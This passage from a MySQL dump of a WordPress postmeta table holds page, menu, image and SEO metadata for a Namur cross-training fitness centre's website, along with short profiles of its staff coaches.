  `post_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_postmeta`
--

INSERT INTO `www2_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1552, 392, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(4, 5, '_edit_last', '1'),
(5, 5, '_edit_lock', '1383585459:1'),
(6, 5, '_wp_page_template', 'default'),
(7, 9, '_edit_last', '1'),
(8, 9, '_edit_lock', '1429607218:1'),
(9, 9, '_wp_page_template', 'default'),
(10, 11, '_edit_last', '1'),
(11, 11, '_edit_lock', '1441212234:3'),
(12, 11, '_wp_page_template', 'default'),
(2168, 472, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2167, 472, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2166, 472, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429606242:1\";}\";'),
(2165, 472, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(50, 20, '_edit_lock', '1429609608:1'),
(22, 14, '_menu_item_type', 'post_type'),
(23, 14, '_menu_item_menu_item_parent', '0'),
(24, 14, '_menu_item_object_id', '9'),
(25, 14, '_menu_item_object', 'page'),
(26, 14, '_menu_item_target', ''),
(27, 14, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(28, 14, '_menu_item_xfn', ''),
(29, 14, '_menu_item_url', ''),
(49, 20, '_edit_last', '1'),
(31, 15, '_menu_item_type', 'post_type'),
(32, 15, '_menu_item_menu_item_parent', '0'),
(33, 15, '_menu_item_object_id', '5'),
(34, 15, '_menu_item_object', 'page'),
(35, 15, '_menu_item_target', ''),
(36, 15, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(37, 15, '_menu_item_xfn', ''),
(38, 15, '_menu_item_url', ''),
(51, 20, '_wp_page_template', 'default'),
(40, 16, '_menu_item_type', 'custom'),
(41, 16, '_menu_item_menu_item_parent', '0'),
(42, 16, '_menu_item_object_id', '16'),
(43, 16, '_menu_item_object', 'custom'),
(44, 16, '_menu_item_target', ''),
(45, 16, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(46, 16, '_menu_item_xfn', ''),
(47, 16, '_menu_item_url', 'http://www.crosstrainingcenter.be/'),
(52, 22, '_edit_last', '1'),
(53, 22, '_edit_lock', '1383585403:1'),
(54, 22, '_wp_page_template', 'default'),
(55, 24, '_menu_item_type', 'post_type'),
(56, 24, '_menu_item_menu_item_parent', '0'),
(57, 24, '_menu_item_object_id', '22'),
(58, 24, '_menu_item_object', 'page'),
(59, 24, '_menu_item_target', ''),
(60, 24, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(61, 24, '_menu_item_xfn', ''),
(62, 24, '_menu_item_url', ''),
(64, 25, '_menu_item_type', 'post_type'),
(65, 25, '_menu_item_menu_item_parent', '0'),
(66, 25, '_menu_item_object_id', '20'),
(67, 25, '_menu_item_object', 'page'),
(68, 25, '_menu_item_target', ''),
(69, 25, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(70, 25, '_menu_item_xfn', ''),
(71, 25, '_menu_item_url', ''),
(86, 68, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:16:\"2013/06/trx1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"trx1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(85, 68, '_wp_attached_file', '2013/06/trx1.jpg'),
(87, 70, '_wp_attached_file', '2013/06/kb.jpg'),
(88, 70, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:14:\"2013/06/kb.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"kb-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(89, 72, '_wp_attached_file', '2013/06/vipr-f1.jpg'),
(90, 72, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2013/06/vipr-f1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"vipr-f1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(91, 75, '_wp_attached_file', '2013/06/ript.jpg'),
(92, 75, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:16:\"2013/06/ript.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"ript-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(106, 102, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1116;s:6:\"height\";i:287;s:4:\"file\";s:17:\"2013/06/pico1.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"pico1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"pico1-300x77.png\";s:5:\"width\";i:300;s:6:\"height\";i:77;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"pico1-1024x263.png\";s:5:\"width\";i:1024;s:6:\"height\";i:263;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:17:\"pico1-595x224.png\";s:5:\"width\";i:595;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(107, 103, '_wp_attached_file', '2013/06/picto2.png'),
(108, 103, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1045;s:6:\"height\";i:1077;s:4:\"file\";s:18:\"2013/06/picto2.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"picto2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"picto2-291x300.png\";s:5:\"width\";i:291;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"picto2-993x1024.png\";s:5:\"width\";i:993;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:18:\"picto2-595x224.png\";s:5:\"width\";i:595;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(105, 102, '_wp_attached_file', '2013/06/pico1.png'),
(109, 130, '_wp_attached_file', '2013/06/rg.jpg'),
(110, 130, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:132;s:6:\"height\";i:195;s:4:\"file\";s:14:\"2013/06/rg.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"rg-132x150.jpg\";s:5:\"width\";i:132;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(111, 148, '_edit_last', '1'),
(1551, 392, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1030, 331, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1031, 331, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374769981:1\";}\";'),
(1032, 331, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1033, 11, '_su_title', 'Cross Training Center - Les séances'),
(1054, 334, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1034, 11, '_su_description', 'Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training'),
(1035, 11, '_su_rich_snippet_type', 'none'),
(218, 148, 'nom', 'Pierrard'),
(219, 148, 'prenom', 'Julie'),
(220, 148, 'mail', 'julie@crosstrainingcenter.be'),
(221, 148, 'actif_trombi', 'oui'),
(222, 148, 'fonction', 'Gérante, Diététicienne et coach'),
(223, 148, 'telephone_fixe', ''),
(224, 148, 'telephone_portable', ''),
(225, 148, 'commentaires', 'Baccalauréat en diététique\r\nSpécialisation en diététique du sport\r\nEnseignante en éducation nutritionnelle\r\nPratiquante de judo, natation et cyclisme'),
(226, 148, 'actif_trombi_1', ''),
(141, 148, '_edit_lock', '1372860691:1'),
(142, 150, '_edit_last', '1'),
(1026, 22, '_su_rich_snippet_type', 'none'),
(1018, 328, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1019, 328, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373526228:1\";}\";'),
(1020, 328, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1021, 330, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1022, 330, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374769809:1\";}\";'),
(1023, 330, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1024, 22, '_su_title', 'Cross Training Center - Le cross training'),
(1025, 22, '_su_description', 'Unique à Namur, une nouvelle façon de faire du fitness. Le cross training regroupe les disciplines : TRX Suspension Training, Kettlebell, ViPR, RIP Trainer.'),
(1060, 335, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(191, 150, 'nom', 'Gille'),
(192, 150, 'prenom', 'Mathieu'),
(193, 150, 'mail', ''),
(194, 150, 'actif_trombi', 'oui'),
(195, 150, 'fonction', 'Coatch'),
(196, 150, 'telephone_fixe', ''),
(197, 150, 'telephone_portable', ''),
(198, 150, 'commentaires', 'Préparateur physique en sport collectif et individuel\r\nBrevet A de l’URBSFA\r\nPratiquant de foot, triathlon, tennis et golf'),
(199, 150, 'actif_trombi_1', ''),
(172, 150, '_edit_lock', '1372861677:1'),
(1550, 392, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1549, 392, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(230, 154, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(231, 154, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372866031:1\";}\";'),
(232, 154, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1548, 392, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383772046:1\";}\";'),
(1547, 392, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1546, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1545, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1544, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1543, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1542, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383772031:1\";}\";'),
(1541, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1540, 391, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(251, 155, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(252, 155, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372866736:1\";}\";'),
(253, 155, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(254, 156, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(255, 156, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372866772:1\";}\";'),
(256, 156, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(257, 157, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(258, 157, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372866815:1\";}\";'),
(259, 157, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(260, 158, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(261, 158, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372866881:1\";}\";'),
(262, 158, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1539, 391, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(266, 159, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(267, 159, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372867702:1\";}\";'),
(268, 159, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(269, 160, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(270, 160, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372867707:1\";}\";'),
(271, 160, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1538, 391, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1537, 391, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(275, 161, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(276, 161, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372868240:1\";}\";'),
(277, 161, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1536, 391, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383771971:1\";}\";'),
(1535, 391, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1534, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1533, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1532, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(287, 162, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(288, 162, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372868811:1\";}\";'),
(289, 162, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(290, 163, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(291, 163, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372868821:1\";}\";'),
(292, 163, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(293, 164, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(294, 164, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372868861:1\";}\";'),
(295, 164, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(296, 165, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(297, 165, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372868903:1\";}\";'),
(298, 165, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1531, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1530, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383771956:1\";}\";'),
(1529, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(302, 166, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(303, 166, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869018:1\";}\";'),
(304, 166, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(305, 167, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(306, 167, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869154:1\";}\";'),
(307, 167, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(308, 168, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(309, 168, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869159:1\";}\";'),
(310, 168, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(311, 169, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(312, 169, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869186:1\";}\";'),
(313, 169, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(314, 170, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(315, 170, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869226:1\";}\";'),
(316, 170, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(317, 171, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(318, 171, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869284:1\";}\";'),
(319, 171, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(320, 172, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(321, 172, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869702:1\";}\";'),
(322, 172, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(326, 173, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(327, 173, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869819:1\";}\";'),
(328, 173, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(329, 174, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(330, 174, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870126:1\";}\";'),
(331, 174, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(332, 175, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(333, 175, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870146:1\";}\";'),
(334, 175, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(338, 176, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(339, 176, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870404:1\";}\";'),
(340, 176, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(347, 177, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(348, 177, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870855:1\";}\";'),
(349, 177, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(350, 178, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(351, 178, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870868:1\";}\";'),
(352, 178, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(353, 179, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(354, 179, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870920:1\";}\";'),
(355, 179, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(356, 180, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(357, 180, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870942:1\";}\";'),
(358, 180, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1528, 390, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:198;s:6:\"height\";i:259;s:4:\"file\";s:28:\"2013/05/chloe_chmiel_pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"chloe_chmiel_pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:28:\"chloe_chmiel_pti-198x224.jpg\";s:5:\"width\";i:198;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";d:2.79999999999999982236431605997495353221893310546875;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"Canon IXUS 115 HS\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1383595205;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"5\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";}}'),
(1527, 390, '_wp_attached_file', '2013/05/chloe_chmiel_pti.jpg'),
(362, 181, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(363, 181, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372871113:1\";}\";'),
(364, 181, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(365, 182, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(366, 182, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372871840:1\";}\";'),
(367, 182, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1526, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(371, 183, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(372, 183, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372872257:1\";}\";'),
(373, 183, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1525, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(377, 184, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(378, 184, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372872467:1\";}\";'),
(379, 184, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1524, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1523, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(383, 185, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(384, 185, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372872582:1\";}\";'),
(385, 185, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1522, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383771896:1\";}\";'),
(1521, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(389, 186, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(390, 186, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372872809:1\";}\";'),
(391, 186, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1520, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(395, 187, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(396, 187, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372872880:1\";}\";'),
(397, 187, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1519, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1518, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1517, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(404, 188, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(405, 188, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873027:1\";}\";'),
(406, 188, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(407, 189, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(408, 189, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873080:1\";}\";'),
(409, 189, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(410, 190, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(411, 190, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873122:1\";}\";'),
(412, 190, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(413, 191, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(414, 191, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873176:1\";}\";'),
(415, 191, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(416, 192, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(417, 192, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873192:1\";}\";'),
(418, 192, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(419, 193, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(420, 193, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873207:1\";}\";'),
(421, 193, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(422, 194, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(423, 194, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873226:1\";}\";'),
